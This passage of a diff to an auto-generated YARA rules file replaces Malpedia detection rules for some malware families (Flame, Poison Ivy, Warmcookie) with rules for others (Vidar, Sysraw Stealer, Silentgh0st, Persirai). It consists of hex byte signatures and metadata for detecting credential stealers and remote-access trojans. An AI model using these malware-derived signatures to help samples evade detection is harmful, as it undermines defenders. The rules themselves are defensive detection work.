-		$sequence_1 = { 488d15b1eb0000 33c9 ff15???????? 488b4c2448 85c0 7429 }
-		$sequence_2 = { 33df 8bfb 41895f50 4133f9 448bcf }
-		$sequence_3 = { 448d4205 4889442420 e8???????? 85c0 498bcd 480f498c24b8000000 }
-		$sequence_4 = { ff90e8000000 488bd8 4885c0 754c 89442430 448d4b30 488d442430 }
-		$sequence_5 = { 488bc2 448b0d???????? 90 443908 7507 6644394004 }
-		$sequence_6 = { 48896c2450 0f57c0 c744244800040000 4d8bcf 488b4958 4c89742440 448d4209 }
-		$sequence_7 = { 4055 57 488d6c24b1 4881ecf8000000 488b0d???????? 4885c9 }
-		$sequence_8 = { 48ffc1 33c2 69d093010001 493bc8 72ed 488d0dfe060200 660f1f440000 }
-		$sequence_9 = { 4c89642430 4c89642428 4c89642420 0f1145b0 e8???????? 3d03010000 7534 }
+		$sequence_0 = { ff15???????? 56 ff15???????? 8b8c2418010000 }
+		$sequence_1 = { 8b4e24 51 ffd7 8b5628 6aff }
+		$sequence_2 = { 55 8b2d???????? 57 eb02 }
+		$sequence_3 = { 75b1 8b442418 8bce 0bc8 }
+		$sequence_4 = { 8b4e2c 2bca 894c2414 8b08 83f909 0f87fa060000 ff248dd0580110 }
+		$sequence_5 = { 894578 e8???????? 83c438 89457c 8b8c249c010000 5f 8bc5 }
+		$sequence_6 = { 7505 e8???????? 8a03 8b35???????? 8b3d???????? 3c26 }
+		$sequence_7 = { c7466c00000000 e8???????? 8b4c2410 8bc6 5f 5e }
+		$sequence_8 = { 2bc1 894c2430 f6c310 74d3 83e30f 3bc3 }
+		$sequence_9 = { 56 ff15???????? 8bf8 85ff 752b 68???????? e8???????? }
+		$sequence_10 = { 52 53 ff15???????? 5f 83f801 7406 ff15???????? }
+		$sequence_11 = { 7507 c74724b0302a00 8b4728 8b4f20 6a18 }
+		$sequence_12 = { 83f901 0f82fd020000 8b460c 8b4488fc eb02 33c0 }
+		$sequence_13 = { 55 8bac2408010000 56 33f6 }
+		$sequence_14 = { 890f c70005000000 8b4704 85c0 0f846fffffff 8b0f }
 
 	condition:
-		7 of them and filesize < 421888
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Newposthings_Auto : FILE
+rule MALPEDIA_Elf_Persirai_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "38b154f6-846a-5678-b350-8d87b17b6222"
+		id = "996dcf89-95a6-5052-ad1f-80d616d26c39"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newposthings_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.persirai_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "fee15bf490538f6a36053584f37721547efa8e7cc1e683e754b3484ec8de6c80"
+		logic_hash = "c89a0c1c6fb24b2cd2b602725441f1c71ea63a845e8a02036d6cfd2667993400"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90776,32 +91116,32 @@ rule MALPEDIA_Win_Newposthings_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8bcf e8???????? 8bf0 c645fc04 68dcc40110 8d55d4 }
-		$sequence_1 = { 83e11f 8b048538f34500 c1e106 0fbe440804 83e040 5d }
-		$sequence_2 = { ebb4 c745e4141d0210 a1???????? eb1a c745e4101d0210 a1???????? eb0c }
-		$sequence_3 = { 50 baccc40110 8d8dd8feffff e8???????? 83c404 c645fc08 8d4d20 }
-		$sequence_4 = { 8d8d40feffff e9???????? 8d8d24feffff e9???????? 8d8d24feffff }
-		$sequence_5 = { 8d4dd8 e9???????? 8b8d04ffffff e9???????? 8b4d80 e9???????? 8d4d9c }
-		$sequence_6 = { 33cd e8???????? 8be5 5d c21000 817e1800010000 }
-		$sequence_7 = { 8d853cfeffff 50 6a01 6a00 }
-		$sequence_8 = { 8bf0 eb02 33f6 c7442428ffffffff 85f6 7506 56 }
-		$sequence_9 = { c78500ffffff0f000000 c785fcfeffff00000000 c685ecfeffff00 c645fc0e 837d9810 }
+		$sequence_0 = { 83c420 6a00 6a0d 68???????? 8b442414 }
+		$sequence_1 = { 89542414 8a16 46 8d42d0 3c09 76e4 }
+		$sequence_2 = { c3 57 56 53 31ff 8b4c2414 }
+		$sequence_3 = { 83c410 31c0 85db 740a e8???????? 8918 83c8ff }
+		$sequence_4 = { e8???????? 83c418 56 57 e8???????? 59 }
+		$sequence_5 = { 8b400c e9???????? 8b4e28 898ddcdcffff 8b5e24 }
+		$sequence_6 = { 83c410 85db 7405 3b5f10 72e5 8b4654 }
+		$sequence_7 = { 8d50a9 09da eba9 8a06 3c39 8d50d0 7e10 }
+		$sequence_8 = { 83c41c c3 53 8b5a18 eb0d 3b5918 }
+		$sequence_9 = { 8d41be 3c16 770c 25ff000000 ff248560790508 0fbed2 }
 
 	condition:
-		7 of them and filesize < 827392
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Flame_Auto : FILE
+rule MALPEDIA_Win_Colibri_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b53c0a2c-8618-5e74-aa3e-ccb8cf016906"
+		id = "8da162c4-201b-5524-b753-fac10e260355"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flame_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.colibri_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "0f55b9dade05164e67ff141163e2392fbdf01e6db384f40da8132a7d5263b81a"
+		logic_hash = "4b78974320f8236aa3537bed6c446de746d50c1762246c89daad71b2e8c53347"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90815,75 +91155,73 @@ rule MALPEDIA_Win_Flame_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c9 741a 83f901 7415 e8???????? }
-		$sequence_1 = { 7426 488d4def e8???????? 90 }
-		$sequence_2 = { 7424 448865dc 41c1ec08 488d55dc }
-		$sequence_3 = { 395d0c 0f84e6020000 3bc3 0f84f7020000 83f803 7251 8b4648 }
-		$sequence_4 = { 7426 4883fa18 7420 4883fa20 }
-		$sequence_5 = { 833e0b 7506 c7060c000000 8b420c 8b4a10 8365dc00 }
-		$sequence_6 = { 894678 8b4670 894664 c7466002000000 3bd3 7476 }
-		$sequence_7 = { c645fc01 85c9 740a ff7508 e8???????? eb02 33c0 }
-		$sequence_8 = { 85c0 7423 8b5500 498bcd }
-		$sequence_9 = { 7424 488b0b 4533c9 448bc6 488bd5 48897c2428 }
-		$sequence_10 = { 8b90b0000000 4903d3 eb64 448bc0 }
-		$sequence_11 = { 50 e8???????? 59 895e0c 885dfc 8b4604 3bc3 }
-		$sequence_12 = { 8365fc00 8b4d08 c700???????? 89480c 834dfcff 8b4df4 }
-		$sequence_13 = { 56 8b7006 85f6 7525 50 8d4dc8 }
-		$sequence_14 = { 7424 488b4b08 8b45d0 482b0b }
+		$sequence_0 = { eb03 8b75f8 a1???????? 8bcb 8d144502000000 e8???????? a1???????? }
+		$sequence_1 = { 1bc9 81e100008000 51 53 53 ff770c ff7708 }
+		$sequence_2 = { 03c6 8945f4 85db 7417 8b0cba 03ce e8???????? }
+		$sequence_3 = { 33d0 8bc2 c1e80b eb23 0fb706 03d0 }
+		$sequence_4 = { 33c0 663b4f06 eb70 8b55fc 0fb7c0 6bf028 8b541624 }
+		$sequence_5 = { 8d8564fbffff 50 6a05 59 e8???????? }
+		$sequence_6 = { 83e801 7448 83e801 0f859f000000 85f6 7433 8bce }
+		$sequence_7 = { 3bce 7363 8b39 85ff 745a 8b4104 8d5108 }
+		$sequence_8 = { ffd0 85c0 745d 8b4df0 e8???????? 8bf8 }
+		$sequence_9 = { 6a02 59 e8???????? ba724e4352 8bc8 e8???????? ffd0 }
 
 	condition:
-		7 of them and filesize < 1676288
+		7 of them and filesize < 51200
 }
-rule MALPEDIA_Win_Poison_Ivy_Auto : FILE
+rule MALPEDIA_Win_Webc2_Greencat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ec8c2f98-412f-543c-9758-b1aacde91b4e"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poison_ivy_auto.yar#L1-L91"
+		id = "a0848a27-48e1-5e07-b0d1-bb056774f373"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_greencat_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "431acfd8496c54390529508a28488eb12118d11f97e2de9a76cce0e819bacb59"
+		logic_hash = "b537e733fea445e18ae7f3686bce35348807c75f49bc5b86c1bc51245964fe49"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff9681000000 80beaf08000001 7507 b902000080 eb05 }
-		$sequence_1 = { b902000080 eb05 b901000080 8d45fc }
-		$sequence_2 = { 51 ff5635 68ff000000 8d86b1060000 }
-		$sequence_3 = { 50 6a01 6a00 8d86120e0000 50 ff75fc }
-		$sequence_4 = { b901000080 8d45fc 50 683f000f00 6a00 57 51 }
-		$sequence_5 = { 51 57 ff9681000000 8d45fc }
-		$sequence_6 = { 8d86120e0000 50 ff75fc ff563d ff75fc ff5631 }
+		$sequence_0 = { 5b b8???????? 53 50 50 33ff }
+		$sequence_1 = { e8???????? 83c414 33c9 3bfb 7632 }
+		$sequence_2 = { 59 59 8b45d4 3818 0f857dfeffff }
+		$sequence_3 = { 75c9 be00000200 397d08 7e08 }
+		$sequence_4 = { 33ff e8???????? 83c40c be???????? ff35???????? 56 }
+		$sequence_5 = { eb27 68???????? eb20 68???????? eb19 ff15???????? 3d26040000 }
+		$sequence_6 = { c20800 ff74240c ff74240c ff74240c ff710c ff15???????? c20c00 }
+		$sequence_7 = { c645e840 c645e94a c645eae6 c645eb1a c645ec14 885ded }
+		$sequence_8 = { 50 ff750c e8???????? 68???????? ff750c e8???????? 83c410 }
+		$sequence_9 = { 50 ff15???????? 3bc7 59 7405 a3???????? 8a45ff }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Warmcookie_Auto : FILE
+rule MALPEDIA_Win_Sysraw_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c556795a-a9b2-5224-af08-851a57d361f5"
+		id = "a136ac6f-472d-54c5-b881-5ee87f9b3845"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warmcookie"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.warmcookie_auto.yar#L1-L195"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sysraw_stealer_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "205c15eced2ed79efcc622047f0495a7c9e5251bb4fd9a4d1e0ae8a704e7e82e"
+		logic_hash = "a39e6a22fe8b2e74d45c7a3cdbaed2c5766660fde9e3c6d0bcfa65b1acb00f24"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90895,45 +91233,34 @@ rule MALPEDIA_Win_Warmcookie_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f85c0000000 4183e801 4489430c 0f1f840000000000 }
-		$sequence_1 = { 4863d3 4801d2 31c9 6641890c14 4883c438 }
-		$sequence_2 = { 0f8758fcffff e9???????? 448b6b0c 4439e8 }
-		$sequence_3 = { e8???????? 39c3 7f1c 4863d3 4801d2 }
-		$sequence_4 = { 4829c4 4c8d642420 4c89e6 4885d2 0f84f0010000 }
-		$sequence_5 = { f7c700040000 0f8440ffffff 4c39e6 0f877cfdffff }
-		$sequence_6 = { 4889c8 83c001 894324 83ee01 7236 }
-		$sequence_7 = { ff15???????? 25ff0f0000 8d88b80b0000 ff15???????? }
-		$sequence_8 = { e8???????? 3dff2f0000 0f97c0 0fb6c0 }
-		$sequence_9 = { ba18000000 4889c1 ffd3 85c0 }
-		$sequence_10 = { 488b01 ff9080000000 85c0 7815 }
-		$sequence_11 = { ba19000000 488b4c2438 ff15???????? 85c0 }
-		$sequence_12 = { 75e2 488b3d???????? 31ed 8b07 }
-		$sequence_13 = { 85c0 7409 488b442428 48c1e814 }
-		$sequence_14 = { 0fb710 6683fa20 76e4 4189c8 4183f001 }
-		$sequence_15 = { 4885c0 741a 89742428 4183c9ff }
-		$sequence_16 = { 488b01 ff5018 85c0 0f88b9000000 }
-		$sequence_17 = { 41be01000000 4489742454 4585e4 0f84aa000000 488d9550010000 b904010000 ff15???????? }
-		$sequence_18 = { 8b7500 33c0 f04d0fb1bcf1d0300200 488bd8 740e 483bc7 }
-		$sequence_19 = { 48ffc1 4881f900010000 72f0 4532d2 4c8bc6 }
-		$sequence_20 = { 488b4da7 ff15???????? 488bc3 488b4d37 4833cc e8???????? 488b9c2418010000 }
+		$sequence_0 = { ff5208 8b4510 8b8d7cffffff 8908 8b45fc 8b4dec }
+		$sequence_1 = { 8d9504ffffff 8d8508ffffff 52 8d8d0cffffff }
+		$sequence_2 = { 8d4db8 ff15???????? 8b0b 8d55a4 }
+		$sequence_3 = { 6a03 8d55a4 68???????? 52 897de0 89bd7cffffff }
+		$sequence_4 = { 8d8d54ffffff 50 8d9558ffffff 51 8d855cffffff 52 8d8d60ffffff }
+		$sequence_5 = { 8b00 50 6a01 ff15???????? 56 8945cc }
+		$sequence_6 = { 8945ec e9???????? 6683fe1f 751d 8b4d0c 68???????? }
+		$sequence_7 = { 2bc7 8d4da4 c1e003 51 50 6880000000 53 }
+		$sequence_8 = { 8b5004 894ddc 8b4808 894dd0 8b4814 }
+		$sequence_9 = { ff15???????? 0faff7 0375cc 81e60f000080 }
 
 	condition:
-		7 of them and filesize < 331776
+		7 of them and filesize < 1540096
 }
-rule MALPEDIA_Win_Polyvice_Auto : FILE
+rule MALPEDIA_Win_Vidar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2290fade-1786-50c9-a103-500f2794f68d"
+		id = "4940e312-352d-5104-84b1-3e1a86d1ecab"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.polyvice_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vidar_auto.yar#L1-L422"
 		license_url = "N/A"
-		logic_hash = "099fd1583428c4dcd9d4587ff6b2523b274374d689fdabd70b857d716538d61f"
+		logic_hash = "78072c96fd4e60233539f368a83645e6e3c45bf8d23ede4d4f8a97936d6b546c"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90945,32 +91272,69 @@ rule MALPEDIA_Win_Polyvice_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 448b7c2434 41c1ef0a 4531fe 4589e7 4131ef 4401f0 458dac0567292914 }
-		$sequence_1 = { 448d4001 4d63c0 4d01c0 488d0c4a 488b13 e8???????? 83ff01 }
-		$sequence_2 = { 488b4040 4889942498020000 48898424a0020000 488b05???????? 488b10 48899424a8020000 488b5008 }
-		$sequence_3 = { 4885c0 4889c3 743d 8928 488d0dbcf00000 48897808 ff15???????? }
-		$sequence_4 = { 488b5020 4889942430040000 488b5028 4889942438040000 488b5030 4889942440040000 }
-		$sequence_5 = { 01d6 01f1 c1cd07 41c1c40e 41c1ed03 4131ec 4531ec }
-		$sequence_6 = { 894608 49c1e820 4c01ca 4c01c2 4101fb 44891e 89560c }
-		$sequence_7 = { 488b5918 488b0b ff15???????? 4889d9 89c6 e8???????? 89f0 }
-		$sequence_8 = { 42083c18 89f7 6644898040080000 29cf 89f9 41d3f9 }
-		$sequence_9 = { 41c1cc02 c1c705 4101ff 8b7c2410 31c7 31cf d1c7 }
+		$sequence_0 = { 05c39e2600 894114 c1e810 25ff7f0000 c3 e8???????? 8b486c }
+		$sequence_1 = { 7202 8b00 8d8d68fdffff 51 50 }
+		$sequence_2 = { 8b7508 33db 895dd0 c746140f000000 895e10 8975cc }
+		$sequence_3 = { 8b8648af0100 c1e803 038644af0100 5e 5d c3 }
+		$sequence_4 = { 5f c6043300 8bc6 5e 5b c20400 }
+		$sequence_5 = { 89b55cfdffff 89bd60fdffff 8d450c 50 }
+		$sequence_6 = { d9e0 d99d00ffffff d98500ffffff d91c24 }
+		$sequence_7 = { 740a b800000500 e9???????? 57 }
+		$sequence_8 = { 895dfc e8???????? 83781408 c645fc01 }
+		$sequence_9 = { 8b7508 33ff 89b55cfdffff 89bd60fdffff }
+		$sequence_10 = { 56 8b742408 8b865caf0100 57 }
+		$sequence_11 = { 5e c20400 ff742408 e8???????? 59 83f8ff 7503 }
+		$sequence_12 = { c9 c3 8b542408 85d2 7503 33c0 c3 }
+		$sequence_13 = { 83781410 7202 8b00 50 8b45a0 }
+		$sequence_14 = { 50 ff15???????? 8b4da0 8901 }
+		$sequence_15 = { 53 68???????? 6802000080 ff15???????? 85c0 751b }
+		$sequence_16 = { c1e004 8bf0 0fbe4301 50 }
+		$sequence_17 = { 68???????? e8???????? 59 83f820 }
+		$sequence_18 = { 50 6a09 53 68???????? }
+		$sequence_19 = { 50 0fb605???????? 50 6a01 }
+		$sequence_20 = { 399e70af0600 7514 c78678af060001000000 c78670af060000000100 68fcff0100 8d8670af0400 }
+		$sequence_21 = { 53 50 899e6caf0600 e8???????? }
+		$sequence_22 = { 895df0 8d45f0 50 6a09 }
+		$sequence_23 = { 0fbe4301 50 8bc1 50 }
+		$sequence_24 = { 53 68???????? 8d8da8000000 e8???????? }
+		$sequence_25 = { 741d ff75f0 ff15???????? 895df0 395df0 740c }
+		$sequence_26 = { 68fcff0100 8d8670af0400 53 50 }
+		$sequence_27 = { c3 55 8bec 83ec0c 8365fc00 8365f400 8365f800 }
+		$sequence_28 = { 8910 8b4120 8910 8b4130 8910 c3 56 }
+		$sequence_29 = { 8d852cffffff 50 8d459c 50 }
+		$sequence_30 = { c20400 56 8bf1 e8???????? 6a00 ff74240c 8bce }
+		$sequence_31 = { 0faf450c 50 e8???????? 59 }
+		$sequence_32 = { 8b4508 8906 8b450c 894608 8b4510 }
+		$sequence_33 = { e8???????? c9 c3 55 8bec 83ec18 8b450c }
+		$sequence_34 = { 50 ff15???????? 6a1a e8???????? }
+		$sequence_35 = { 6860ea0000 6a00 ff15???????? 50 ff15???????? }
+		$sequence_36 = { ff15???????? 59 59 50 6a06 }
+		$sequence_37 = { 5f c21000 8bff 55 8bec 6a0a 6a00 }
+		$sequence_38 = { e8???????? 83c410 85c0 7404 6a99 ebcc }
+		$sequence_39 = { 83e03f 03d2 897110 894104 8911 5e c3 }
+		$sequence_40 = { 80780800 7404 33c0 40 c3 33c0 }
+		$sequence_41 = { dd1c24 83ec08 dd4508 dd1c24 6a0b 6a10 e8???????? }
+		$sequence_42 = { dd4508 dd1c24 6a0b 6a08 e8???????? 83c41c }
+		$sequence_43 = { eb0b 8b45f4 0500040000 8945f4 }
+		$sequence_44 = { 8bc6 5e c3 56 8bf1 6a08 }
+		$sequence_45 = { 8bc6 5e c20800 8b3f 85ff 7426 }
+		$sequence_46 = { 8bc6 5e c3 8b0a 80790d00 750c }
 
 	condition:
-		7 of them and filesize < 369664
+		7 of them and filesize < 4751360
 }
-rule MALPEDIA_Win_Alpc_Lpe_Auto : FILE
+rule MALPEDIA_Win_Molerat_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2d2adcb6-f098-569a-bf85-49ff70d8e48c"
+		id = "bbb2773d-16c5-5ea1-96c6-2ff80ea4ab38"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alpc_lpe_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.molerat_loader_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "f41b95cac61aef76c7f2f31b4e9f327d93351cd15a34ca1f25e406b880001510"
+		logic_hash = "f7f702f0dc9bfb0fb7a2fb852c5b313a67822e64049d201a13fd2318ed509e52"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90984,32 +91348,32 @@ rule MALPEDIA_Win_Alpc_Lpe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 4883ec28 488d6a20 4533c0 b201 488b8d50010000 e8???????? }
-		$sequence_1 = { 488d0d50830000 33d2 e8???????? 488bf8 4885c0 7507 }
-		$sequence_2 = { e8???????? 4885c0 0f85ce000000 488d15cfa90000 488bcb e8???????? }
-		$sequence_3 = { 488bc1 488b8d18010000 48894c2428 488b8d10010000 48894c2420 4c8b8d08010000 4c8b8500010000 }
-		$sequence_4 = { 48837d0801 770d 48c785f800000001000000 eb0e 488b4508 48ffc8 488985f8000000 }
-		$sequence_5 = { 90 488d4d08 e8???????? 0fb685c4020000 488bf8 488d4dd0 488d15f3d40000 }
-		$sequence_6 = { 4c8d05cbfa0000 488d1574fb0000 488d0d95fb0000 ff15???????? 486b856801000010 }
-		$sequence_7 = { 488bd0 488d4d04 e8???????? 488b8d00010000 }
-		$sequence_8 = { 488b8d20010000 e8???????? 488b8d28010000 488d0448 48894508 488b8d20010000 }
-		$sequence_9 = { 4c8d4dbf 33d2 4c8d05cc7e0000 488bcf ffd3 85c0 }
+		$sequence_0 = { 89480c 894808 c3 6a14 e8???????? 59 85c0 }
+		$sequence_1 = { 668b4d08 663b8800b64300 740c 40 40 }
+		$sequence_2 = { 83c40c 32c0 e9???????? 8d55d4 52 68???????? 50 }
+		$sequence_3 = { 59 59 80cb01 8bc6 c1f805 8d0c8520924400 8bc6 }
+		$sequence_4 = { 50 8b4204 ffd0 c745fcffffffff 8b85e4070000 83c0f0 8d480c }
+		$sequence_5 = { 8d55ec 68???????? 52 c645fc0d e8???????? }
+		$sequence_6 = { c645fc07 e8???????? 83c40c 885dfc e8???????? }
+		$sequence_7 = { 68000000a0 8d55ec 52 8bce e8???????? 6a00 6a00 }
+		$sequence_8 = { e8???????? ff45c0 8b5dd8 47 e9???????? }
+		$sequence_9 = { e8???????? 83c40c 83bd74ffffff00 7f05 e8???????? 8b9d70ffffff e8???????? }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 688128
 }
-rule MALPEDIA_Win_Spica_Auto : FILE
+rule MALPEDIA_Win_Silentgh0St_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b6a1a6a9-846d-5070-af66-e8c23c4a6b50"
+		id = "4a960624-dc10-5985-85b4-1cf5514d3775"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spica"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spica_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silentgh0st"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.silentgh0st_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a88bf3ca9882c583346cf58a04e5a1e9985797df2dfd737cf0e029b406925de0"
+		logic_hash = "a3ef882d6032b75964ce0bbd68389a460d9ac4c6db1e56db70620c83eabc0109"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91023,32 +91387,32 @@ rule MALPEDIA_Win_Spica_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8d8c040000 898df0000000 488b8d58040000 898df4000000 488b8de8030000 48898df8000000 4889b5c8000000 }
-		$sequence_1 = { e9???????? c6850708000001 c6850608000001 c6850508000001 488d05f0a93100 4889442420 488d0d046e3a00 }
-		$sequence_2 = { eb08 498bc8 e8???????? 0fb64354 2c01 884354 7594 }
-		$sequence_3 = { e9???????? 488b5710 4883c710 4885d2 0f8553ffffff eba4 418b7f10 }
-		$sequence_4 = { e8???????? 410fb68539010000 4c8b4f08 488b9500060000 488b4a60 488b5270 88442470 }
-		$sequence_5 = { 84db 7536 488b05???????? 48c1e001 4885c0 7426 e9???????? }
-		$sequence_6 = { ffcb 4883c720 85db 7fde 498b5740 4885d2 7410 }
-		$sequence_7 = { eb28 48895d50 b908000000 ba10000000 e8???????? eb13 48895d50 }
-		$sequence_8 = { e9???????? 4d89dc 4c89d9 4889fa e8???????? 84c0 0f842f010000 }
-		$sequence_9 = { e9???????? 4983c303 eb3e b80e000000 e9???????? 4983c304 eb2e }
+		$sequence_0 = { c1f905 8b0c8d00c40e10 83e01f c1e006 8d440124 8b4d10 8a10 }
+		$sequence_1 = { c3 b808000000 e8???????? 8b4c2418 33c0 85c9 0f8ee6000000 }
+		$sequence_2 = { 3bc7 7432 ff7308 50 e8???????? ff33 e8???????? }
+		$sequence_3 = { a801 752a 8b5500 57 52 e8???????? 83c408 }
+		$sequence_4 = { 8bc6 c1f805 8bfe 53 8d1c8500c40e10 8b03 83e71f }
+		$sequence_5 = { e8???????? 83c408 85c0 0f8431020000 8b4c2440 8b06 8b9084000000 }
+		$sequence_6 = { 8d6f03 8d4e01 895c2420 c744242404000000 8d642400 8b5c2428 0fb61c03 }
+		$sequence_7 = { c3 55 8bec 833d????????00 7505 e8???????? 33c9 }
+		$sequence_8 = { 83c410 833d????????00 750a c705????????18f60c10 68cc000000 68???????? 6a02 }
+		$sequence_9 = { 7ccc 8b5c2408 85db 7409 56 57 6a03 }
 
 	condition:
-		7 of them and filesize < 14034944
+		7 of them and filesize < 2065408
 }
-rule MALPEDIA_Win_Dmsniff_Auto : FILE
+rule MALPEDIA_Win_Asruex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3835a0ad-5401-5196-a04a-4e4d20ae32c6"
+		id = "899abd0f-c835-5f70-819c-92570cc9b462"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dmsniff_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.asruex_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "9e4ba2c64d589b228eae63b3a713959af97846eab54c3823ca80a7bfedbc8089"
+		logic_hash = "a14db0e4e44f1156fe16afe843345aa29b9b1f1eb3cc060b10e0bcdf06eb97d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91062,73 +91426,70 @@ rule MALPEDIA_Win_Dmsniff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
